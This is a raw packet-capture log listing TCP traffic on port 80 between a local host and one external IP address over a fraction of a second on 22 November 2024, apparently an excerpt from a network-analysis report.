Nov 22, 2024 14:17:46.202064037 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202075005 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202085972 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202099085 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202109098 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202110052 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202122927 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202136040 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202147007 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202151060 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202157974 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202169895 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202174902 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202182055 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202193975 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202197075 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202204943 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202212095 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202219963 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202230930 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202249050 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202250957 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202260017 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202270985 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202279091 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202282906 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202292919 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202296972 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202306032 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202316046 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202322006 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202327013 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202342987 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202347040 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202353954 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202363968 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202364922 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202375889 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202383041 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202385902 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202398062 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202398062 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202409983 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202415943 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202420950 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202433109 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202436924 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202459097 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202461004 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202474117 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202486992 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202498913 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202508926 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202517033 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202521086 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202532053 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202543020 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202550888 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202569008 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202574968 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202585936 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202599049 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202610970 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202620983 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202624083 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202632904 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202653885 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202666044 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202794075 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202809095 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202821970 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202832937 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202846050 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202848911 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202857018 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202862024 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202871084 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202882051 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202892065 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202893019 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202913046 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202919960 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202931881 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202943087 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202944040 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202954054 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202970982 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202974081 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202981949 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202991009 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203135014 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.203196049 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203207016 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203216076 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203233004 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203247070 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203252077 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.203258038 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203269958 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203279018 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.203280926 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203293085 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203304052 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203324080 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203331947 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.203336000 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203350067 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203361034 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203373909 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.203386068 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203396082 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203407049 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203408003 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.203418016 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203429937 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203434944 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.203440905 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203452110 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203457117 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.203464031 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203474998 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203480005 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.203500986 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.203521967 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.203927994 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203941107 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.203952074 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.204006910 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.204090118 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.204101086 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.204112053 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.204123020 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.204133034 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.204144001 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.204144955 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.204158068 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.204169035 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.204169989 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.204180956 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.204190016 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.204191923 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.204204082 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.204215050 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.204216003 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.204246044 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.204607964 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.204677105 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.205327034 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.205406904 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.205420017 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.205446959 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.206299067 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.206348896 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.206439972 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.207333088 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.207371950 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.207973003 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.207984924 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.207994938 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.208029985 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.208857059 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.208899975 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.209340096 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.209722042 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.209733009 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.209788084 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.210634947 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.210834980 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.210949898 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.211448908 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.211513042 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.212359905 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.212372065 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.212383986 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.212421894 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.213186979 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.213248968 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.213258028 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.214066982 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.214112997 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.214416981 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.214996099 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.215141058 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.215189934 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.215816021 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.215859890 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.216039896 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.216697931 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.216710091 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.216756105 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.217739105 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.217801094 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.217852116 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.218457937 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.218508005 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.218842030 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.219306946 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.219352961 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.220114946 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.220225096 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.220236063 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.220277071 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.221110106 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.221122026 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.221190929 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.222064018 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.222171068 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.222232103 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.222857952 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.222906113 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.223323107 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.223855972 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.223869085 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.223916054 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.224674940 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.224685907 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.224731922 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.225430965 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.225610018 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.225913048 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.226321936 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.226334095 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.226377010 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.227180004 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.227241039 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.227874994 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.228091002 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.228107929 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.228140116 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.228979111 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.228991032 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.229036093 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.229803085 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.229865074 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.230158091 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.230673075 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.230684996 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.230726004 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.231951952 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.231996059 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.232184887 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.232456923 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.232467890 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.232517004 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.233534098 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.233556986 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.233591080 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.234383106 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.234447002 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.389892101 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.390017033 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.390320063 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.390398979 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.390410900 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.390450954 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.390487909 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.391180992 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.391227007 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.391454935 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.391995907 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.392009020 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.392065048 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.392806053 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.392992020 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.393570900 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.393594027 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.393604994 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.393634081 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.394454002 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.394468069 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.394526005 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.395207882 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.395262003 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.395773888 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.396063089 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.396075010 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.396116018 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.396908998 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.397051096 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.397114992 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.397775888 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.398612022 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.398622990 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.398636103 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.398665905 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.399290085 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.399549007 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.400187969 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.400201082 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.400233030 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.400247097 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.400954008 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.401786089 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.401796103 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.401807070 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.401849031 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.402662039 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.402674913 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.402723074 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.403393030 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.403438091 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.403759003 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.404238939 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.404251099 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.404299021 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.405148029 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.405278921 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.405359983 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.405853987 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.406229019 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.406483889 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.406682014 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.406693935 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.406830072 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.407515049 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.407563925 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.408335924 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.408348083 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.408360004 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.408396006 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.409111023 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.409929037 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.409941912 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.409953117 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.409993887 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.410023928 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.410849094 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.410861015 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.411303043 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.411628962 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.411640882 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.411679029 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.412417889 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.412430048 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.412462950 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.413232088 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.413244009 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.413296938 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.414067030 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.414079905 CET	80	49750	94.156.177.166	192.168.2.7
